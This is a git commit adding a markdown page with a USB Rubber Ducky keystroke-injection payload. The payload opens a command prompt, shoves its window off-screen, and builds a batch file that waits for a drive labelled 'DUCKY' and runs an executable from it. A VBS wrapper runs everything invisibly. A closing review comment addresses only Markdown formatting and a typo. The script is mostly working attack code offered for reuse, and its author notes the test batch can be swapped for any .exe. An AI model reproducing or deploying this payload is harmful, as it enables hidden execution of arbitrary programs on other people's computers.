Created Payload runexe from sd (markdown)

This commit is contained in:
overwraith 2013-02-07 17:09:29 -08:00
parent 4f431f9156
commit 2e445ffd6c
1 changed files with 115 additions and 0 deletions

Payload---runexe-from-sd.md Normal file

@ -0,0 +1,115 @@
The following is a payload I have been working on that waits until a drive labeled "DUCKY" is mounted. I have used some of midnightsnake's code in this payload. I have been having some problems with delays so I went a little overboard with the "DELAY 25" codes. The name of the file that is run can be changed to .exe, I am just having it run a batch for testing purposes. The line that says "STRING %myd%\myEXE.bat" is the line that executes the executable.
'''
REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
DELAY 4000
REM Using the run command for a broader OS base.
GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 25
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
DELAY 25
STRING erase /Q DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING copy con DuckyWait.bat
DELAY 25
ENTER
DELAY 25
REM DuckyWait.bat
DELAY 25
STRING :while1
DELAY 25
ENTER
DELAY 25
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
DELAY 25
ENTER
DELAY 25
STRING if Exist %myd% (
DELAY 25
ENTER
DELAY 25
STRING goto break
DELAY 25
ENTER
DELAY 25
STRING )
DELAY 25
ENTER
DELAY 25
STRING timeout /t 30
DELAY 25
ENTER
DELAY 25
STRING goto while1
DELAY 25
ENTER
DELAY 25
STRING :break
DELAY 25
ENTER
DELAY 25
REM Continue script.
DELAY 25
STRING %myd%\myEXE.bat
DELAY 25
ENTER
DELAY 25
CONTROL z
DELAY 25
ENTER
DELAY 25
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
DELAY 25
REM Delete vbs file if already exists
DELAY 25
STRING erase /Q invis.vbs
DELAY 25
ENTER
DELAY 25
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
DELAY 25
STRING copy con invis.vbs
DELAY 25
ENTER
DELAY 25
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
DELAY 25
ENTER
DELAY 25
CONTROL Z
DELAY 25
ENTER
DELAY 25
REM RUN THE BATCH FILE
DELAY 25
STRING wscript.exe invis.vbs DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING EXIT
ENTER
'''
The following is the batch file that is run after the "DUCKY" drive has been mounted. Everything is being run invisibly, so you will need to check for the existence of "Message.txt" which will probably be in "C:\Windows\system32".
'''
REM Message.txt
echo Hello Wolrd!!!
echo Hello World!!! > Message.txt
'''
This payload requires the REPEAT command, so until the online payload generator is online again, or the encoders start supporting the REPEAT command you will be stuck with copy and pasting the repeat command 100 times. I recommend pasting by groups of five or ten.
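Review bot: the code fences in this file will not render, because Markdown does not treat `'''` (three single quotes) as a fence; the payload between the first pair of `'''` lines and the batch file between the second pair will display as run-on paragraphs with the `REM` and `DELAY 25` lines merged together, so each `'''` should be replaced with three backticks. The second block is also mislabelled: its header `REM Message.txt` names the output file, while the prose says this is the batch file the payload executes via `STRING %myd%\myEXE.bat`, so the comment should read `REM myEXE.bat`; and `echo Hello Wolrd!!!` has a typo for "World".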